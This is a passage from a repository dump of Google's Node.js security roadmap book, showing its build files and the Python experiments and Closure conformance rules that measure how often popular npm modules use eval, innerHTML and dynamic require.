Repository: google/node-sec-roadmap
Branch: master
Commit: 8e01b94ee2a7
Files: 84
Total size: 248.2 KB

Directory structure:
gitextract_n0lxbnc6/

├── .bookignore
├── .gitignore
├── .well-known/
│   └── security.txt
├── CONTRIBUTING.md
├── CONTRIBUTORS.md
├── LICENSE
├── Makefile
├── README.md
├── SUMMARY.md
├── app.yaml
├── appendix/
│   ├── .gitignore
│   ├── bad-pattern-grep/
│   │   └── experiment.py
│   ├── dyn-load/
│   │   └── experiment.py
│   ├── experiments.md
│   ├── jsconf/
│   │   ├── conformance_proto.textproto
│   │   └── experiment.py
│   ├── lazy-load/
│   │   └── experiment.py
│   ├── py_common/
│   │   ├── __init__.py
│   │   └── npm.py
│   ├── test-code/
│   │   └── experiment.py
│   ├── top100.txt
│   └── uses-scripts/
│       └── experiment.py
├── book.json.withcomments
├── chapter-1/
│   ├── recap.md
│   ├── threat-0DY.md
│   ├── threat-BOF.md
│   ├── threat-CRY.md
│   ├── threat-DEX.md
│   ├── threat-DOS.md
│   ├── threat-EXF.md
│   ├── threat-LQC.md
│   ├── threat-MTP.md
│   ├── threat-QUI.md
│   ├── threat-RCE.md
│   ├── threat-SHP.md
│   ├── threat-UIR.md
│   └── threats.md
├── chapter-2/
│   ├── bounded-eval.md
│   ├── bundling.md
│   ├── dynamism.md
│   ├── example/
│   │   ├── .gitignore
│   │   ├── graphs/
│   │   │   ├── filtered.dot
│   │   │   └── full.dot
│   │   ├── index.js
│   │   ├── lib/
│   │   │   ├── dynamic.js
│   │   │   ├── lazy.js
│   │   │   ├── opt2.js
│   │   │   └── static.js
│   │   ├── make_dep_graph.sh
│   │   ├── package.json
│   │   └── test/
│   │       └── test.js
│   ├── experiments/
│   │   └── webpack-compat/
│   │       ├── .gitignore
│   │       ├── goodbye.js
│   │       ├── hello.js
│   │       ├── index.js
│   │       ├── package.json
│   │       ├── test/
│   │       │   └── test.js
│   │       ├── test-utils.js
│   │       ├── test.sh
│   │       └── webpack.config.js
│   ├── source-contents.md
│   ├── synthetic-modules.md
│   └── what-about-eval.md
├── chapter-3/
│   └── knowing_dependencies.md
├── chapter-4/
│   └── close_dependencies.md
├── chapter-5/
│   └── oversight.md
├── chapter-6/
│   └── failing.md
├── chapter-7/
│   ├── child-processes.md
│   ├── examples/
│   │   ├── sh/
│   │   │   ├── index.js
│   │   │   ├── package.json
│   │   │   └── test/
│   │   │       └── test.js
│   │   └── sql/
│   │       ├── index.js
│   │       ├── package.json
│   │       └── test/
│   │           └── test.js
│   ├── libraries.md
│   ├── query-langs.md
│   └── structured-strings.md
├── cover.md
├── license.md
├── package.json
├── styles/
│   └── website.css
└── third_party/
    ├── __init__.py
    └── jslex/
        ├── __init__.py
        └── jslex.py

================================================
FILE CONTENTS
================================================

================================================
FILE: .bookignore
================================================
app.yaml
Makefile
book.json.withcomments
appendix/**/*.py
appendix/**/*.textproto
chapter-2/example/**/*.js
chapter-2/experiments/**/*.js
chapter-7/examples/**/*.js
CONTRIBUTING.md
**/*.sh
third_party
package.json
package-lock.json


================================================
FILE: .gitignore
================================================
# See appendix/README.md for how to run experiments.
appendix/jsconf/externs
appendix/tools
# Generated by `npm install`
node_modules
npm-debug.log
chapter-2/example/package-lock.json
# Generated by Makefile
www
deploy
.*.tstamp
#book.json  # Should be ignored but breaks gitbook
# Generated by `gitbook serve
_book
# Emacs droppings
.\#*
*~
# Python droppings
*.pyc


================================================
FILE: .well-known/security.txt
================================================
Contact: mikesamuel@gmail.com
Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md


================================================
FILE: CONTRIBUTING.md
================================================
# How to Contribute

We'd love to accept your patches and contributions to this project. There are
just a few small guidelines you need to follow.

## Contributor License Agreement

Contributions to this project must be accompanied by a Contributor License
Agreement. You (or your employer) retain the copyright to your contribution;
this simply gives us permission to use and redistribute your contributions as
part of the project. Head over to <https://cla.developers.google.com/> to see
your current agreements on file or to sign a new one.

You generally only need to submit a CLA once, so if you've already
submitted one (even if it was for a different project), you probably
don't need to do it again.

## Code reviews

All submissions, including submissions by project members, require review. We
use GitHub pull requests for this purpose. Consult
[GitHub Help](https://help.github.com/articles/about-pull-requests/) for more
information on using pull requests.


================================================
FILE: CONTRIBUTORS.md
================================================
* [Ali Ijaz Sheikh](https://github.com/ofrobots)
* [Franziska Hinkelmann](https://github.com/fhinkel/)
* [Jen Tong](https://github.com/mimming)
* [John J. Barton](https://github.com/johnjbarton)
* [Justin Beckwith](https://github.com/JustinBeckwith)
* [Mark S. Miller](https://github.com/erights)
* [Mike Samuel](https://github.com/mikesamuel)
* [Myles Borins](https://github.com/mylesborins)

Special thanks for feedback and criticism:

* [Matteo Collina](https://github.com/mcollina)
* [Rich Trott](https://github.com/Trott)


================================================
FILE: LICENSE
================================================
Markdown and gitbook content is (C) Google LLC and is
made available under
https://creativecommons.org/licenses/by/4.0/


Code is avilable under the Apache 2.0 License
---------------------------------------------
Copyright 2017 Google LLC

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    https://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

================================================
FILE: Makefile
================================================
# This Makefile builds various versions of the Gitbook, runs
# sanity checks, and sets up a deployment directory.
#
# See `make help`

define HELP
Targets
=======
`make book`         puts HTML files under www/
`make pdf`          builds the PDF version
`make serve_static` serve the book from http://localhost:4000/
`make serve`        launch the builtin gitbook debug server
`make check`        runs sanity checks
`make deploy`       builds the deployment directory and runs checks

Setup
=====
This assumes that PATH includes
   https://github.com/gjtorikian/html-proofer
   https://calibre-ebook.com/download
that the following environment variables point to reasonable values:
   HTML_PROOFER   # path to htmlproofer executable
   CALIBRE_HOME   # path to directory containing calibre executables

Deploying
=========
`make deploy` builds the deploy directory.
From that directory `gcloud app deploy --project node-sec-roadmap`
deploys to the canonical location if you have the right
privileges and have run `gcloud auth login`.
endef
export HELP


ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))

# External dependency used to detect dead links
ifeq ($(HTML_PROOFER),)
  HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer
  ifeq (,$(wildcard ${HTML_PROOFER}))
	HTML_PROOFER:=/bin/echo
  endif
endif

# External dependency used to build pdf
ifeq ($(CALIBRE_HOME),)
  CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/
endif


# Bits that gitbook depends on
GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \
		$(wildcard chapter-*/*.md) appendix/experiments.md \
		styles/website.css images/*


help:
	@echo "$$HELP"

book.json : book.json.withcomments
	@cat book.json.withcomments \
	| perl -ne 'print unless m/^[ \t]*#/' > book.json

pdf : www/node-sec-roadmap.pdf
www/node-sec-roadmap.pdf : $(GITBOOK_DEPS)
	PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \
	    ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf

book : www/.book.tstamp
www/.book.tstamp : $(GITBOOK_DEPS)
	"${ROOT_DIR}"/node_modules/.bin/gitbook build . www
	@touch www/.book.tstamp

check : .check.tstamp
.check.tstamp : deploy/.deploy.tstamp
	touch .check.tstamp
	echo Checking that we correctly capitalize npm and Nodejs
	echo and that all Markdown link names are defined.
	@! find deploy/www/ -name \*.html \
	    | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \
	    | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/'
	echo Checking for dead links
	@if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \
		echo "Warning: HTML_PROOFER not available"; \
	else \
		echo Running htmlproofer; \
		"${HTML_PROOFER}" \
		  --alt-ignore=example/graphs/full.svg \
		  "${ROOT_DIR}"/deploy/www/; \
	fi
	@find deploy -name node_modules \
	    || (echo "deploy/ should not include node_modules"; false)

serve : $(GITBOOK_DEPS)
	"${ROOT_DIR}"/node_modules/.bin/gitbook serve

serve_static : book
	pushd www; python -m SimpleHTTPServer 4000; popd

clean :
	rm -rf www/ deploy/ _book/ book.json .*.tstamp

node_modules : package.json
	npm install --only=prod
	@touch node_modules/

deploy : deploy/.deploy.tstamp check
deploy/.deploy.tstamp : book pdf app.yaml
	rm -rf deploy/
	mkdir deploy/
	cp app.yaml deploy/
	cp -r www/ deploy/www/
	@touch deploy/.deploy.tstamp


================================================
FILE: README.md
================================================
# Node.js Security Roadmap

The security roadmap is a [gitbook](https://toolchain.gitbook.com/)
publication available at
*[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*.

```sh
$ npm start
```

will serve the book via `localhost:4000`.

```sh
$ make help
```

will display help information about other options.

Please file errata at the
[issue tracker](https://github.com/google/node-sec-roadmap/issues)
or send us a pull request.

If you'd like to help out, please also see our
[contribution guidelines](CONTRIBUTING.md).


================================================
FILE: SUMMARY.md
================================================
# Summary

*  [Threat Environment](chapter-1/threats.md)
  *  [Zero Day](chapter-1/threat-0DY.md)
  *  [Buffer Overflow](chapter-1/threat-BOF.md)
  *  [Weak Crypto](chapter-1/threat-CRY.md)
  *  [Poor Developer Experience](chapter-1/threat-DEX.md)
  *  [Denial of Service](chapter-1/threat-DOS.md)
  *  [Exfiltration of Data](chapter-1/threat-EXF.md)
  *  [Low Quality Code](chapter-1/threat-LQC.md)
  *  [Malicious Third-Party Code](chapter-1/threat-MTP.md)
  *  [Query Injection](chapter-1/threat-QUI.md)
  *  [Remote Code Execution](chapter-1/threat-RCE.md)
  *  [Shell Injection during Production](chapter-1/threat-SHP.md)
  *  [Unintended Require](chapter-1/threat-UIR.md)
  *  [Recap](chapter-1/recap.md)
*  [Dynamism when you need it](chapter-2/dynamism.md)
  *  [Dynamic Bundling](chapter-2/bundling.md)
  *  [Production Source Lists](chapter-2/source-contents.md)
  *  [What about eval?](chapter-2/what-about-eval.md)
  *  [Synthetic Modules](chapter-2/synthetic-modules.md)
  *  [Bounded Eval](chapter-2/bounded-eval.md)
*  [Knowing your dependencies](chapter-3/knowing_dependencies.md)
*  [Keeping your dependencies close](chapter-4/close_dependencies.md)
*  [Oversight](chapter-5/oversight.md)
*  [When all else fails](chapter-6/failing.md)
*  [Library support for safe coding practices](chapter-7/libraries.md)
  *  [Query languages](chapter-7/query-langs.md)
  *  [Child processes](chapter-7/child-processes.md)
  *  [Structured strings](chapter-7/structured-strings.md)

----

*  [Appendix: Experiments](appendix/experiments.md)
*  [Contributors](CONTRIBUTORS.md)
*  [License](license.md)
*  [Errata](https://github.com/google/node-sec-roadmap/issues)


================================================
FILE: app.yaml
================================================
# cloud.google.com/appengine/docs/standard/python/config/appref
runtime: python27
api_version: 1
threadsafe: true

handlers:
- url: /
  static_files: www/index.html
  upload: www/index.html
  secure: always
  mime_type: text/html; charset=UTF-8
  expiration: 30m

- url: /(.*[.]html)$
  static_files: www/\1
  upload: www/(.*[.]html)$
  secure: always
  mime_type: text/html; charset=UTF-8
  expiration: 30m

- url: /(.*[.]css)$
  static_files: www/\1
  upload: www/(.*[.]css)$
  secure: always
  mime_type: text/css; charset=UTF-8
  expiration: 30m

- url: /(.*[.]js)$
  static_files: www/\1
  upload: www/(.*[.]js)$
  secure: always
  mime_type: text/javascript; charset=UTF-8
  expiration: 30m

- url: /(.*[.]json)$
  static_files: www/\1
  upload: www/(.*[.]json)$
  secure: always
  mime_type: application/json; charset=UTF-8
  expiration: 30m

- url: /(.*[.]txt)$
  static_files: www/\1
  upload: www/(.*[.]txt)$
  secure: always
  mime_type: text/plain; charset=UTF-8
  expiration: 30m

- url: /(.*[.]svg)$
  static_files: www/\1
  upload: www/(.*[.]svg)$
  secure: always
  mime_type: image/svg+xml; charset=UTF-8
  expiration: 30m

- url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
  static_files: www/\1
  upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
  secure: always
  expiration: 30m

skip_files:
- ^(.*/)?#.*#$
- ^(.*/)?.*~$
- ^(.*/)?.*\.py[co]$
- ^(.*/)?.*/RCS/.*$
- ^(.*/)?\.(?!well-known(?:/|$)).*$


================================================
FILE: appendix/.gitignore
================================================
node_modules/**
separate-modules/**
**~
**.pyc


================================================
FILE: appendix/bad-pattern-grep/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
Look for problematic patterns like calls to eval and assignments
to innerHTML that often lead to XSS when not consistently guarded.
"""

import py_common.npm
import re
import sys

_LEFT_BOUNDARY = r'(?<![.$_\w])'
_RIGHT_BOUNDARY = r'(?![.$_\w])'

_PATTERNS = (
    ('eval',
     re.compile(_LEFT_BOUNDARY + r'eval' + _RIGHT_BOUNDARY)),
    ('Function constructor',
     re.compile(_LEFT_BOUNDARY + 'new\s*Function' + _RIGHT_BOUNDARY)),
    ('innerHTML assignment',
     re.compile('[.]\s*(inner|outer)HTML\s*=')),
    ('URL property assignment',
     re.compile('[.]\s*(src|href)\s*=')),
)

def find_violations(node_modules, module_name):
    violations = []
    js_srcs = py_common.npm.js_srcs_almost_worst_case(node_modules, module_name)
    for (_, js_path) in js_srcs:
        content = py_common.npm.preprocess_js_content(file(js_path, 'r').read())
        for (rule_name, pattern) in _PATTERNS:
            for _ in pattern.finditer(content):
                violations.append(rule_name)
    return violations


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    # Maps rule identifiers to sets of offending modules.
    rule_violations = {}

    module_count = 0
    for module_name in top100:
        violations = find_violations(node_modules, module_name)
        if 'Parse error' in violations or 'Argument list too long' in violations:
            pass
        else:
            module_count += 1
        for v in violations:
            if v in rule_violations:
                vmap = rule_violations[v]
            else:
                vmap = rule_violations[v] = {}
            vmap[module_name] = vmap.get(module_name, 0) + 1

    # TODO: exclude Parse error and Argument list too long

    print "## Grepping for Problems {#grep-problems}"
    print ""
    print "JS Conformance uses sophisticated type reasoning to find"
    print "problems in JavaScript code"
    print "(see [JS Conformance experiment](#jsconf))."
    print "It may not find problems in code that lacks type hints"
    print "or that does not parse."
    print ""
    print "Grep can be used to reliably find some subset of problems that"
    print "JS Conformance can identify."
    print ""
    print "If grep finds more of the kinds of problems that it can find"
    print "than JS Conformance, then the code cannot be effectively vetted"
    print "by code quality tools like JS Conformance."
    print ""
    print "| Violation | Count of Modules | Total Count | Quartiles |"
    print "| --------- | ---------------- | ----------- | --------- |"
    for (v, vmap) in sorted(rule_violations.items()):
        count = 0
        total_count = 0
        values = vmap.values()
        for n in values:
            count += 1
            total_count += n
        values += [0] * (module_count - count)
        values.sort()
        quartiles = '%d / %d / %d' % (
            values[len(values) >> 2],
            values[len(values) >> 1],
            values[(len(values) * 3) >> 2],
        )
        print "| `%s` | %d | %d | %s |" % (
            v, count, total_count, quartiles)


================================================
FILE: appendix/dyn-load/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Looks for dynamic code loading patterns.

Patterns to identify include

  * require(...) where ... is not a string literal.
  * eval
  * Function(...) where there is more than one argument or the sole
    argument is not a function.

"""

import json
import os.path
import py_common.npm
import re
import shutil
import sys


dynamic_load_pattern = re.compile(
    r'(?<![_$\w.])require\s*\(\s*[^\s)\"\']'
#    r'(?<![_$\w.])require\s*(?:\(\s*[^\s)\"\']|[^\(])'  # To also match indirect uses of require, like aliasing it to a variable.
    )

def find_dynamic_load(node_modules, module_name):
    return py_common.npm.js_srcs_matching(
        node_modules, module_name, dynamic_load_pattern,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    uses = 0
    total_count = 0
    has_dynamic_load = {}
    for module_name in top100:
        js_srcs = find_dynamic_load(node_modules, module_name)
        has_dynamic_load[module_name] = js_srcs
        if len(js_srcs):
            uses += 1
        total_count += 1

#    for k, v in has_dynamic_load.iteritems():
#        print "%s: %r" % (k, v)

    print (
"""
## Dynamic loads {#dynamic_load}

Dynamic loading can complicate code bundling.

%d of %d = %1.02f%% call `require(...)` without a literal string argument.
""" % (uses, total_count, (100.0 * uses) / total_count))


================================================
FILE: appendix/experiments.md
================================================
# npm Experiments

Below are summaries of experiments to check how compatible common npm
modules are with preprocessing, static checks, and other measures
to manage cross-cutting security concerns.


<!-- Begin generated summary -->

## Grepping for Problems {#grep-problems}

JS Conformance uses sophisticated type reasoning to find
problems in JavaScript code
(see [JS Conformance experiment](#jsconf)).
It may not find problems in code that lacks type hints
or that does not parse.

Grep can be used to reliably find some subset of problems that
JS Conformance can identify.

If grep finds more of the kinds of problems that it can find
than JS Conformance, then the code cannot be effectively vetted
by code quality tools like JS Conformance.

| Violation | Count of Modules | Total Count | Quartiles |
| --------- | ---------------- | ----------- | --------- |
| `Function constructor` | 32 | 200 | 0 / 0 / 1 |
| `URL property assignment` | 35 | 471 | 0 / 0 / 3 |
| `eval` | 24 | 87 | 0 / 0 / 0 |
| `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 |

## Dynamic loads {#dynamic_load}

Dynamic loading can complicate code bundling.

33 of 108 = 30.56% call `require(...)` without a literal string argument.

## JS Conformance {#jsconf}

JS Conformance identifies uses of risky APIs.

Some modules did not parse.  This may be dues to typescript.
JSCompiler doesn't deal well with mixed JavaScript and TypeScript
inputs.

If a module is both in the top 100 and is a dependency of another
module in the top 100, then it will be multiply counted.

Out of 69 modules that parsed

| Violation | Count of Modules | Total Count | Quartiles |
| --------- | ---------------- | ----------- | --------- |
| `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 |
| `Argument list too long` | 8 | 8 | 0 / 0 / 0 |
| `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 |
| `Parse error.` | 31 | 232 | 0 / 0 / 2 |
| `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 |
| `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 |
| `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 |
| `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 |
| `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 |
| `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 |

## Lazy loads {#lazy_load}

Lazy loading can complicate code bundling if care is not taken.

71 of 108 = 65.74% contain a use of require inside a `{...}` block.


## Prod bundle includes test code {#test_code}

Some of the top 100 modules are test code, e.g. mocha, chai.
This measures which modules, when installed `--only=prod` include
test patterns.

50 of 108 = 46.30% contain test code patterns


## Uses Scripts {#uses_scripts}

Unless steps are taken, installation scripts run code on
a developer's workstation when they have write access to
local repositories.  If this number is small, having
humans check installation scripts before running might
be feasible.

4 of 979 = 0.41% use installation scripts


<!-- End generated summary -->


## Methodology

The code is [available on Github][code].

```bash
$ npm --version
3.10.10
```

### Top 100 Module list

I extracted `top100.txt` by browsing to the most depended-upon
[package list][top100] and running the below in the dev console until
I had >= 100 entries.

```js
var links = document.querySelectorAll('a.name')
var top100 = Object.create(null)
for (var i = 0; i < links.length; ++i) {
  var link = links[i];
  var packageName = link.getAttribute('href').replace(/^.*\/package\//, '')
  top100[packageName] = true;
}
var top100Names = Object.keys(top100)
top100Names.sort();
top100Names
```

----

We also require some tools so that we can run JSCompiler against
node modules.  From the root directory:

```sh
mkdir tools
curl https://dl.google.com/closure-compiler/compiler-latest.zip \
     > /tmp/closure-latest.zip
pushd tools
  jar xf /tmp/closure-latest.zip
popd
pushd jsconf
  mkdir externs
  pushd externs
    git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git
  popd
popd
```


### Experiments

Each experiment corresponds to a directory with an executable
`experiment.py` file which takes a `node_modules` directory and the top 100
module list and which outputs a snippet of markup.

Running

```bash
cat top100.txt | xargs npm install --ignore-scripts --only=prod
mkdir separate-modules
cd separate-modules
for pn in $(cat ../top100.txt ); do
  mkdir -p "$pn"
  pushd "$pn"
  npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn"
  popd
done
```

pulls down the list of node modules.  As of this writing, there are 980
modules that are in the top100 list or are direct or indirect prod
dependencies thereof.

To run the experiments and place the outputs under `/tmp/mds/`, run

```bash
mkdir -p /tmp/mds/
export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH"
for f in *; do
  if [ -f "$f"/experiment.py ]; then
    "$f"/experiment.py node_modules separate-modules top100.txt \
    > "/tmp/mds/$f.md"
  fi
done
```

Concatenating those markdown snippets produces the summary above.

```bash
(for f in $(echo /tmp/mds/*.md | sort); do
   cat "$f";
 done) \
> /tmp/mds/summary
```

[code]: https://github.com/google/node-sec-roadmap/tree/master/appendix
[top100]: https://www.npmjs.com/browse/depended


================================================
FILE: appendix/jsconf/conformance_proto.textproto
================================================
# Copyright 2014 The Closure Compiler Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# This file contains example JS conformance configurations for various problems
# with JavaScript. Since each project may want to opt-in to different rules, and
# each project may need its own specific whitelist, the examples in this file
# are meant to be copied to a project specific conformance_proto.textproto file.

requirement: {
  type: BANNED_NAME
  error_message: 'eval is not allowed'

  value: 'eval'

  whitelist: 'javascript/closure/base.js'
  whitelist: 'javascript/closure/json/json.js'
}

requirement: {
  rule_id: 'closure:stringFunctionDefinition'
  type: RESTRICTED_NAME_CALL

  value: 'Function:function()'
  value: 'setTimeout:function(string, ...?)'
  value: 'setImmediate:function(string, ...?)'
  value: 'setInterval:function(string, ...?)'
  value: 'requestAnimationFrame:function(string, ...?)'

  error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
}

requirement: {
  rule_id: 'closure:windowStringFunctionDefinition'
  type: RESTRICTED_METHOD_CALL

  value: 'Window.prototype.setTimeout:function(string, ...?)'
  value: 'Window.prototype.setImmediate:function(string, ...?)'
  value: 'Window.prototype.setInterval:function(string, ...?)'
  value: 'Window.prototype.requestAnimationFrame:function(string, ...?)'

  error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
}

requirement: {
  type: BANNED_PROPERTY
  error_message: 'Arguments.prototype.callee'

  value: 'Arguments.prototype.callee'

  whitelist: 'javascript/closure/base.js'  # goog.base uses arguments.callee
  whitelist: 'javascript/closure/debug/'  # legacy stack trace support, etc
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to Element.prototype.innerHTML is not allowed'

  value: 'Object.innerHTML'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'

  # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to
  # innerHTML is a single HTML entity.
  whitelist: 'javascript/closure/string/string.js'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to Element.prototype.outerHTML is not allowed'

  value: 'Object.outerHTML'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to Location.prototype.href is not allowed'

  value: 'Location.prototype.href'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to location is not allowed'

  value: 'Window.prototype.location'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to .href property or src'

  # Types with .href properties that do not extend from Element.
#  value: 'StyleSheet.prototype.href'
#  value: 'CSSImportRule.prototype.href'

  # All other types extend from Element.
#  value: 'Element.prototype.href'
  value: 'Object.href'
  value: 'Object.src'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'
}

requirement: {
  rule_id: 'setAttribute URL'
  type: BANNED_CODE_PATTERN
  error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden'
  value:
      '/**\n'
      ' * @param {*} element\n'
      ' * @param {?} value\n'
      ' */\n'
      'function template(element, value) {'
      '  element.setAttribute(\'src\', value);'
      '}'
  value:
      '/**\n'
      ' * @param {*} element\n'
      ' * @param {?} value\n'
      ' */\n'
      'function template(element, value) {\n'
      '  element.setAttribute(\'href\', value);\n'
      '}'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Use of document.domain is not allowed'

  value: 'Document.prototype.domain'
}


================================================
FILE: appendix/jsconf/experiment.py
================================================
#!/usr/bin/python

"""
Runs JSConformance on each of the top 100 modules and collates the results.
"""

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json
import os.path
import py_common.npm
import re
import shutil
import subprocess
import sys


_error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
# Patterns that can be used to group error messages by glossing over
# any content not in a capturing group.
_simplifier_res = (
    re.compile(r'^(required ").*?(" namespace not provided yet)'),
    re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
    re.compile(r'^(Illegal redeclared variable: ).*'),
    re.compile(r'^(Parse error[.]).*'),
)


def run_jsconf(node_modules, module_name, externs):
    """
    Runs JSConformance on the given module's source files.
    """
    srcs = py_common.npm.js_srcs_almost_worst_case(
        node_modules, module_name,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
    if not srcs:
        raise Exception(module_name + ' has no srcs')
    args = [
        'java',
        '-jar',
        os.path.join(
            os.path.dirname(node_modules),
            'tools',
            'closure-compiler-latest',
            'closure-compiler.jar'),
        '--process_common_js_modules',
        '--checks-only',
        '--third_party=true',
        '--module_resolution=NODE',
        '--js_module_root=%s' % os.path.realpath(node_modules),
        '--jscomp_error=conformanceViolations',
        '--conformance_configs',
        os.path.join(
            os.path.dirname(node_modules),
            'jsconf',
            'conformance_proto.textproto'),
    ]
    for (_, js_file) in srcs:
        args += ['--js', os.path.realpath(js_file)]
    for js_file in sorted(externs):
        args += ['--externs', js_file]
    #print >>sys.stderr, len(' '.join(args))
    if len(' '.join(args)) >= 240000:  # `getconf ARG_MAX` for Mac OSX
        return ['Argument list too long']
    process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    content = process.stdout.read()
    retcode = process.wait()
    violations = []
    if retcode == 0:
        violations.append('Passed')
    for match in _error_re.finditer(content):
        violation = match.group(1)
        for simpler in _simplifier_res:
            match = simpler.match(violation)
            if match:
                violation = '...'.join(match.groups())
        violations.append(violation)
    return violations

if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    externs = set()
    for externs_file in py_common.npm.js_files_under(
            os.path.join(os.path.dirname(sys.argv[0]), 'externs')):
        if os.path.basename(os.path.dirname(externs_file)) == 'tests':
            continue
        externs.add(externs_file)

    # Maps rule identifiers to sets of offending modules.
    rule_violations = {}


    module_count = 0
    for module_name in top100:
        violations = run_jsconf(node_modules, module_name, externs)
        if ('Parse error.' in violations
            or 'Argument list too long' in violations):
            pass
        else:
            module_count += 1
        for v in violations:
            if v in rule_violations:
                vmap = rule_violations[v]
            else:
                vmap = rule_violations[v] = {}
            vmap[module_name] = vmap.get(module_name, 0) + 1

    # TODO: exclude Parse error and Argument list too long

    print "## JS Conformance {#jsconf}"
    print ""
    print "JS Conformance identifies uses of risky APIs."
    print ""
    print "Some modules did not parse.  This may be dues to typescript."
    print "JSCompiler doesn't deal well with mixed JavaScript and TypeScript"
    print "inputs."
    print ""
    print "If a module is both in the top 100 and is a dependency of another"
    print "module in the top 100, then it will be multiply counted."
    print ""
    print "Out of %d modules that parsed" % module_count
    print ""
    print "| Violation | Count of Modules | Total Count | Quartiles |"
    print "| --------- | ---------------- | ----------- | --------- |"
    for (v, vmap) in sorted(rule_violations.items()):
        count = 0
        total_count = 0
        values = vmap.values()
        for n in values:
            count += 1
            total_count += n
        values += [0] * (module_count - count)
        values.sort()
        quartiles = '%d / %d / %d' % (
            values[len(values) >> 2],
            values[len(values) >> 1],
            values[(len(values) * 3) >> 2],
        )
